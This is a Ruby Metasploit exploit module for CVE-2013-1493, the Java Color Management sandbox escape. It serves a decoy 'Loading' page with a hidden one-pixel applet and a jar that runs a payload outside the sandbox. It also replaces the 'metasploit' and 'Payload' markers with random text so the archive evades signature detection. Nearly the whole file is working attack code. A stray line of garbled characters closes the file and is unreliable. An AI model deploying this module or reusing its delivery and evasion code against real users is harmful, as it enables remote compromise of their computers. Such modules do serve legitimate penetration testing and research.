##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
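# Typographic quotes (‘ ’) are not string delimiters in Ruby; both requires
# must use plain ASCII quotes to parse.
require 'msf/core'
require 'rex'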
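class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # Tells BrowserAutopwn this exploit does not rely on client-side JavaScript.
  autopwn_info({ :javascript => false })

  # Module metadata. 'DefaultTarget' => 1 selects the second entry of
  # 'Targets' (the Windows x86 native payload); in the garbled original this
  # line had been pasted into on_request_uri, where it belongs to nothing.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the precompiled applet classes shipped with the framework and
  # randomizes the name of the entry class before the HTTP server is started
  # by +super+.
  #
  # The class files are read from the framework's own install root, never
  # from a datastore option, so no user-controlled path reaches File.join.
  def setup
    @init_class           = read_class_file('Init.class')
    @leak_class           = read_class_file('Leak.class')
    @buffered_image_class = read_class_file('MyBufferedImage.class')
    @color_space_class    = read_class_file('MyColorSpace.class')

    # The replacement has the same length as "Init" so the byte-patched
    # class file keeps its length-prefixed string constants consistent.
    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # Dispatches a client request: any URI ending in ".jar" gets the applet
  # archive, a URI ending in "/" gets the applet page, everything else is
  # redirected to the resource root so the page is served from a
  # directory-style URI.
  #
  # @param cli the connected client
  # @param request the parsed HTTP request (only +uri+ is used)
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_jar(cli)
    when /\/$/
      send_applet_page(cli)
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # Builds the applet page. The archive name is random on every call; only
  # the class name fixed in setup ties the page to the served jar, and the
  # ".jar" route above matches regardless of the random archive name.
  #
  # @return [String] the HTML document
  def generate_html
    [
      '<html><head><title>Loading, Please Wait...</title></head>',
      '<body><center><p>Loading, Please Wait...</p></center>',
      %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|,
      '</applet></body></html>'
    ].join
  end

  private

  # Reads one of the precompiled applet classes from the framework data
  # directory as raw bytes.
  #
  # @param name [String] file name under data/exploits/cve-2013-1493
  # @return [String] the class file contents (binary)
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Serves the applet jar: the payload's encoded jar plus the four exploit
  # classes, with the fixed "metasploit"/"Payload" markers in entry names and
  # entry bytes replaced by same-length random text. Those literal strings
  # are therefore absent from the served archive and are not a usable
  # detection marker; the fixed entry names added below are unchanged.
  #
  # @param cli the connected client
  def send_jar(cli)
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    replacements = {
      'metasploit' => rand_text_alpha('metasploit'.length),
      'Payload'    => rand_text_alpha('payload'.length)
    }
    jar.entries.each do |entry|
      replacements.each do |marker, random|
        entry.name.gsub!(marker, random)
        entry.data = entry.data.gsub(marker, random)
      end
    end
    # Entry names changed above, so the manifest has to be regenerated.
    jar.build_manifest

    send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })
  end

  # Regenerates the payload for this client and serves the applet page.
  # When regeneration fails the client gets a 404 and nothing else.
  #
  # @param cli the connected client
  def send_applet_page(cli)
    regenerated = regenerate_payload(cli)
    unless regenerated
      print_error('Failed to generate the payload.')
      send_not_found(cli)
      return
    end

    send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
  end
end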
4 B0 Q, T9 M2 S; O9 W5 H8 W |